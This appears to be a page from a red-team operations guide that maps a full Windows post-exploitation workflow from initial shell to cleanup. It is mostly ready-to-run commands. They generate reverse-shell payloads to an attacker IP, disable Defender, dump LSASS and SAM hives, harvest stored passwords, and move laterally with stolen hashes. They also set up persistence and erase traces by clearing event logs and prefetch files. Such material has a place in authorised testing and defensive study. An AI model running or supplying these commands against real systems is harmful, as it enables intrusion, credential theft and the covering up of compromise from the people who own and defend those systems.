Skip to main content

Operational Workflow

This page maps a common CTE kill chain - from initial shell to cleanup - with branch points that route to the appropriate technique based on what you find. It is one way to work through an engagement, not the only way. Adapt it to your operational context.

Read the Introduction first for scope and constraints.


Pre-Mission Setup (Before Engaging)​

Before engaging the target, an operator would typically have a listener running and payloads pre-generated. Here is an example setup on Kali:

# Confirm your attacker IP is reachable from the target network
ip a

# Start your multi/handler listener (leave running throughout the mission)
msfconsole -x "use exploit/multi/handler;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"

# Pre-generate standard payloads and serve them
ATTACKER_IP="<YOUR_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f dll -o payload.dll
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f msi -o payload.msi
python3 -m http.server 8080

# For environments where EXE drops are detected, pre-generate a web_delivery fileless cradle
# Run the web_delivery module, copy the generated PS one-liner, replace 0.0.0.0 with your IP

Phase 1: Land and Orient​

With a shell, the first priority is understanding the environment. The T1082 Discovery workflow covers this in depth. A typical starting point:

whoami /all
echo %COMPUTERNAME% && echo %USERDOMAIN% && echo %LOGONSERVER%
systeminfo | findstr /i "domain\|os name\|os version"
ipconfig /all
arp -a
netstat -ano | findstr "LISTENING"

What whoami /all shows shapes the next decision:

What whoami /all showsCommon next step
NT AUTHORITY\SYSTEMSkip Phase 2 - go directly to Phase 3 (Persist) and Phase 4 (Credentials)
BUILTIN\Administrators in groupsPhase 2A (UAC Bypass / AlwaysInstallElevated)
Domain user, no admin groupsPhase 2B (Local Privesc - service misconfigs)
SeDebugPrivilege enabledPhase 4 directly (LSASS dump without UAC bypass)

Phase 2A: Elevate - Already Admin, Need SYSTEM​

If already a local administrator but UAC is blocking full access, the fastest path is typically to check AlwaysInstallElevated first:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If AlwaysInstallElevated is not set, a UAC bypass is needed:

  • Default environment - T1548.002 Fodhelper (user-level admin, UAC prompt bypass via fodhelper registry write)
  • Need a DLL-based bypass - T1548.002 Control.exe (same file, different method)

From an elevated shell, disabling Defender protects subsequently delivered payloads:

Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath "C:\Windows\Temp"

See T1562.001 - Disable Security Tools.


Phase 2B: Elevate - Standard User, No Admin​

With only standard user access, checking for local privilege escalation opportunities in roughly this order tends to be effective:

CheckCommandTechnique if vulnerable
AlwaysInstallElevatedreg query HKCU\...\Installer /v AlwaysInstallElevatedT1548 AlwaysInstallElevated
Unquoted service pathswmic service get Name,PathName | findstr /v """T1574.009
Writable service binariesCheck write perms on service EXE pathsT1574.010
Writable service registry keysCheck write perms on HKLM\SYSTEM\CurrentControlSet\Services\*T1574.011

If no local privesc is available, establishing user-level persistence and waiting is a valid option. A domain admin or privileged user may log in to the same machine - combining the keylogger (T1056.001) or WDigest enable with that wait often yields elevated credentials.


Phase 3: Establish Persistence​

Persistence is typically set before noisy operations like credential dumping or lateral movement sweeps - if the session is lost, having a way back matters. Technique selection depends on context:

ContextOne approachWhy it fits
Standard user, low-detection environmentScheduled Task (T1053.005)Reliable, survives reboot, runs at logon
Standard user, AppLocker activeRegistry Run Key (T1547.001) + fileless cradleNo dropped EXE; PS cradle stored in registry
Administrator, want SYSTEM on rebootWindows Service (T1543.003)Runs as SYSTEM, starts automatically
Administrator, want high stealthWMI Event Subscription (T1546.003)No new binaries; lives in WMI repository
Administrator, want long-term covert accessCOM Hijacking (T1546.015)Fires on logon; hard to detect via normal tooling
SYSTEM, want permanent access regardless of password changesAccessibility Features (T1546.008)SYSTEM shell at login screen, survives all credential rotation

Triggering the persistence manually before moving on - running the scheduled task, restarting the service - and confirming a new session arrives is a good practice before proceeding to noisier phases.


Phase 4: Collect Credentials​

Running credential collection in a low-to-high noise order tends to be effective - stopping when enough is found for the next phase.

Step 1: Plaintext credentials (no elevated rights needed)​

These sources frequently contain plaintext domain credentials and require no privilege escalation to read:

# Auto-logon (often has domain admin password):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# PowerShell history (may contain typed passwords):
type "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# WiFi passwords:
netsh wlan show profiles | findstr "All User"

Full procedure: T1552 - Credentials in Files/Registry

If plaintext credentials are found here, they can feed directly into lateral movement (Phase 5) without needing a dump.

Step 2: Check Credential Manager​

cmdkey /list

Entries under TERMSRV/ (saved RDP) or Domain:target= (saved network credentials) can be reused immediately with runas /savecred. Full procedure: T1003 Method 4 - cmdkey

Step 3: Check LSA protection before attempting LSASS dump​

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
  • RunAsPPL = 1 - LSASS is protected process; comsvcs MiniDump will fail - go to Step 4 (SAM hives)
  • RunAsPPL = 0 or absent - LSASS dump is likely to succeed

Step 4: Dump LSASS (requires SYSTEM or SeDebugPrivilege)​

tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full

Parse on Kali: pypykatz lsa minidump /tmp/lsass.dmp

Step 5: Export SAM/SYSTEM/SECURITY (requires Administrator, no SYSTEM needed)​

reg save HKLM\SAM C:\Windows\Temp\sam.hive
reg save HKLM\SYSTEM C:\Windows\Temp\system.hive
reg save HKLM\SECURITY C:\Windows\Temp\security.hive

Parse on Kali: impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL

Full procedures: T1003 - OS Credential Dumping


Phase 5: Move Laterally​

With credentials (plaintext or NTLM hash), movement to additional hosts becomes possible.

The ARP cache and netstat output from Phase 1 are useful for identifying targets - hosts in the ARP cache are reachable and have recently communicated:

arp -a

Lateral movement method depends on what credentials are available and what services are exposed:

Credential typeRemote OSOne approach
Plaintext domain adminAny Windowsnet use then wmic /node: process call create or schtasks /s
NTLM hash of RID-500 local adminAny Windowsimpacket-psexec -hashes :HASH Administrator@<TARGET> from Kali
Plaintext, WinRM open (port 5985)Any WindowsInvoke-Command -ComputerName <TARGET> -Credential $cred
Plaintext, SMB onlyAny Windowsnet use \\<TARGET>\C$ then sc.exe \\<TARGET> create

Full procedures: T1021 - Lateral Movement

On each new host, restarting from Phase 1 - discovery, privilege check, persistence, credentials - and repeating until objectives are met is the general pattern.


Phase 6: Clean Up​

Working backwards through the footprint before terminating a session. Typical order:

1. Remove persistence - delete scheduled tasks, Run keys, services, WMI subscriptions placed during Phase 3. Each technique file includes a cleanup section.

2. Delete payload files and credential dumps:

del /f /q C:\Windows\Temp\*.exe C:\Windows\Temp\*.dll C:\Windows\Temp\*.dmp
del /f /q C:\Windows\Temp\*.hive C:\Windows\Temp\*.msi C:\Windows\Temp\*.cs

3. Restore security tools (if disabled in Phase 2A):

Set-MpPreference -DisableRealtimeMonitoring $false
Remove-MpPreference -ExclusionPath "C:\Windows\Temp"

4. Overwrite free space in staging directory:

cipher /w:C:\Windows\Temp

5. Clear targeted prefetch entries:

del /f /q "C:\Windows\Prefetch\PAYLOAD*.pf"
del /f /q "C:\Windows\Prefetch\RUNDLL32*.pf"
del /f /q "C:\Windows\Prefetch\MSIEXEC*.pf"

6. Clear event logs - typically the last step before disconnecting:

wevtutil cl Security
wevtutil cl System
wevtutil cl "Microsoft-Windows-Sysmon/Operational"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
wevtutil cl "Microsoft-Windows-TaskScheduler/Operational"

Full procedures: T1070 - Indicator Removal


Decision Tree Summary​

SHELL OBTAINED
β”‚
β”œβ”€β–Ί Phase 1: DISCOVER (orient before anything else)
β”‚ whoami /all β†’ systeminfo β†’ arp -a β†’ netstat -ano
β”‚
β”œβ”€β–Ί Phase 2: ELEVATE
β”‚ SYSTEM already? ──────────────────────────────► skip to Phase 3
β”‚ Admin (in Administrators group)?
β”‚ AlwaysInstallElevated enabled? ──────────► msiexec /i payload.msi /qn β†’ SYSTEM
β”‚ No? ─────────────────────────────────────► Fodhelper UAC bypass β†’ elevated shell
β”‚ Standard user?
β”‚ Unquoted path / writable service? ───────► T1574 privesc
β”‚ Nothing? ────────────────────────────────► persist + collect creds + wait
β”‚
β”œβ”€β–Ί Phase 3: PERSIST (before noisy ops)
β”‚ Low stealth needed? ─────────────────────────► Scheduled Task
β”‚ High stealth needed? ────────────────────────► WMI Subscription or COM Hijack
β”‚ Need SYSTEM persistence? ────────────────────► Windows Service or Accessibility Feature
β”‚
β”œβ”€β–Ί Phase 4: COLLECT CREDENTIALS
β”‚ Check files/registry first (no privesc needed)
β”‚ β”‚ Found plaintext? ─────────────────────────► use directly, skip dump
β”‚ Check cmdkey /list
β”‚ β”‚ Found saved creds? ──────────────────────► runas /savecred
β”‚ RunAsPPL enabled?
β”‚ β”‚ Yes ─────────────────────────────────────► SAM/SYSTEM hives only
β”‚ β”‚ No ──────────────────────────────────────► LSASS MiniDump (comsvcs.dll)
β”‚
β”œβ”€β–Ί Phase 5: MOVE LATERALLY
β”‚ For each target from ARP cache:
β”‚ Authenticate (net use / impacket PTH)
β”‚ Stage payload
β”‚ Execute remotely (wmic / schtasks / sc.exe / WinRM)
β”‚ Restart from Phase 1 on new host
β”‚
└─► Phase 6: CLEAN UP (every host, before disconnect)
Remove persistence β†’ delete files β†’ restore Defender
β†’ overwrite free space β†’ clear prefetch β†’ clear logs

Quick Reference: Technique File Index​

TacticTechniqueFile
PrivescAlwaysInstallElevatedt1548_alwaysinstallelevated
PrivescBypass UAC (Fodhelper / Control.exe)t1548.002_bypass_uac
PrivescUnquoted Service Patht1574.009
PrivescService File Permissionst1574.010
PrivescService Registry Permissionst1574.011
Cred AccessCredentials in Files/Registryt1552
Cred AccessCredential Manager (cmdkey)t1003 - Method 4
Cred AccessLSASS MiniDumpt1003 - Method 1
Cred AccessSAM / SYSTEM hive exportt1003 - Method 2
Lateral MovementAll LOL methodst1021_lateral_movement
Defense EvasionDisable Defender / AMSI / Firewallt1562.001
Defense EvasionObfuscate PS cradlest1027_obfuscation
Defense EvasionSigned binary proxy (AppLocker bypass)t1218
CleanupLog clearing / file deletion / timestompt1070_indicator_removal
DiscoveryFull host enumeration workflowt1082_host_discovery
PersistenceAll 12 methods03_Persistence
Payload generationmsfvenom formats and listenersAPPENDIX/metasploit_payloads
Compiled payloadsC# service EXE, DLL, stagerAPPENDIX/compiled_payloads